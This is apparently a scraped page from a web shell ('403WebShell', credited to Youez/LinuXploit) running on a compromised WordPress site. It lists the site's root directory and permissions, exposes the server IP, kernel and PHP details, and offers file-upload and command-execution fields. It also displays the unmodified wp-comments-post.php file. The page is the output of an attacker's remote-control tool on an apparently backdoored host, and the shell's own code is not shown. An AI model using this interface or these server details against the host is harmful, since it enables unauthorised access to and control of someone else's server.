//home/www/public
NameSizeLast ModifiedPermsActions
.render-cache-2026-07-08 11:53drwxr-xr-x (0755)
.tmb-2026-07-08 11:59drwxrwxrwx (0777)
wp-admin-2026-07-08 13:34drwxr-xr-x (0755)
wp-content-2026-07-09 05:01drwxr-xr-x (0755)
wp-includes-2026-07-09 07:44drwxr-xr-x (0755)
.htaccess233 B2026-07-09 03:46-rw-r--r-- (0644)
.htaccess.bak-20260615392 B2026-06-19 10:07-rw-r--r-- (0644)
index.php405 B2020-02-06 01:03-r--r--r-- (0444)
license.txt19.44 KB2025-12-31 18:37-rw-r--r-- (0644)
readme.html7.23 KB2026-01-09 06:17-rw-r--r-- (0644)
robots.txt75 B2026-06-15 08:44-rw-r--r-- (0644)
wp-blog-header.php351 B2020-02-06 01:03-rw-r--r-- (0644)
wp-comments-post.php2.27 KB2023-06-14 08:41-rw-r--r-- (0644)
wp-config.php3.93 KB2026-07-08 05:27-rw------- (0600)
wp-cron.php5.49 KB2024-08-02 14:10-rw-r--r-- (0644)
wp-links-opml.php2.43 KB2025-04-30 07:22-rw-r--r-- (0644)
wp-load.php3.84 KB2024-03-11 04:35-rw-r--r-- (0644)
wp-login.php50.63 KB2026-02-28 17:27-rw-r--r-- (0644)
wp-mail.php8.52 KB2025-04-02 16:55-rw-r--r-- (0644)
wp-settings.php31.88 KB2026-05-08 10:29-rw-r--r-- (0644)
wp-signup.php33.81 KB2026-02-17 11:35-rw-r--r-- (0644)
wp-trackback.php5.09 KB2025-08-19 07:00-rw-r--r-- (0644)
xmlrpc.php3.13 KB2024-11-08 10:22-rw-r--r-- (0644)
403WebShell
403Webshell
Server IP : 217.160.0.223  /  Your IP : 216.73.216.95
Web Server : Apache
System : Linux www 6.18.38-i1-ampere+ #1089 SMP Tue Jul 7 14:54:42 CEST 2026 aarch64
User : sws1073902667 ( 1073902667)
PHP Version : 8.2.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/www/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/www/public//wp-comments-post.php
<?php
/**
 * Handles Comment Post to WordPress and prevents duplicate comment posting.
 *
 * @package WordPress
 */

if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
	$protocol = $_SERVER['SERVER_PROTOCOL'];
	if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) {
		$protocol = 'HTTP/1.0';
	}

	header( 'Allow: POST' );
	header( "$protocol 405 Method Not Allowed" );
	header( 'Content-Type: text/plain' );
	exit;
}

/** Sets up the WordPress Environment. */
require __DIR__ . '/wp-load.php';

nocache_headers();

$comment = wp_handle_comment_submission( wp_unslash( $_POST ) );
if ( is_wp_error( $comment ) ) {
	$data = (int) $comment->get_error_data();
	if ( ! empty( $data ) ) {
		wp_die(
			'<p>' . $comment->get_error_message() . '</p>',
			__( 'Comment Submission Failure' ),
			array(
				'response'  => $data,
				'back_link' => true,
			)
		);
	} else {
		exit;
	}
}

$user            = wp_get_current_user();
$cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) );

/**
 * Fires after comment cookies are set.
 *
 * @since 3.4.0
 * @since 4.9.6 The `$cookies_consent` parameter was added.
 *
 * @param WP_Comment $comment         Comment object.
 * @param WP_User    $user            Comment author's user object. The user may not exist.
 * @param bool       $cookies_consent Comment author's consent to store cookies.
 */
do_action( 'set_comment_cookies', $comment, $user, $cookies_consent );

$location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID;

// If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message.
if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) {
	$location = add_query_arg(
		array(
			'unapproved'      => $comment->comment_ID,
			'moderation-hash' => wp_hash( $comment->comment_date_gmt ),
		),
		$location
	);
}

/**
 * Filters the location URI to send the commenter after posting.
 *
 * @since 2.0.5
 *
 * @param string     $location The 'redirect_to' URI sent via $_POST.
 * @param WP_Comment $comment  Comment object.
 */
$location = apply_filters( 'comment_post_redirect', $location, $comment );

wp_safe_redirect( $location );
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit